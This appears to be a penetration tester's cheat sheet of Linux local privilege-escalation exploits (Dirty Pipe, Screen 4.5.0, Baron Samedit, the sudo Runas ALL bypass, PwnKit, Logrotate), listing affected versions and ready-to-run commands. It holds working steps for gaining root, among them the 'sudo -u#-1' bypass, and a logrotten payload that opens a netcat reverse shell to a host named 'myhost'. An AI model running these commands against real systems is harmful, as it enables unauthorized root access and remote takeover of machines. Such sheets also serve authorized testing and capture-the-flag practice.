Linux

Index

Name	CVE	Exploit
Dirty Pipe	CVE-2022-0847	Exploit
Screen 4.5.0	CVE-2017-5618	Exploit
Sudo - Baron Samedit	CVE-2021-3156	Exploit
Sudo - Runas ALL	CVE-2019-14287	Exploit
PwnKit -Polkit	CVE-2021-4034	Exploit
Logrotate	/	Exploit

Dirty Pipe

Exploit kernel from 5.8 to 5.17

sudo apt-get install gcc
chmod +x compile.sh
./compile.sh

./exploit-1
# change the root password in the /etc/passwd file and get an elevated shell.

Screen 4.5.0

Exploit

chmod +x 41154.sh
./41154.sh

Sudo - Baron Samedit

Exploit sudo 1.8.21 | 1.8.31 | 1.8.27 | 1.9.2 | other

Sudo - Runas ALL

Exploit sudo < 1.8.28

Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL in the Runas specifier.

ex. alice myhost = (ALL) /usr/bin/id

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction.

ex. bob myhost = (ALL, !root) /usr/bin/vi

sudo -u#-1 vi
sudo -u#4294967295 vi

PwnKit - Polkit

Exploit1 / Exploit2 Polkit < 0.105-26

pkexec --version

gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc

Logrotate

Exploit Logrotate 3.8.6 | 3.11.0 | 3.15.0 | 3.18.0

You have to find log files on which logrotate is run and on which you have write permissions. Then run exploit on the writable log file.

gcc -o logrotten logrotten.c

Prepare payload

echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

If "create"-option is set in logrotate.cfg:

./logrotten -p ./payloadfile /tmp/log/pwnme.log

If "compress"-option is set in logrotate.cfg:

./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log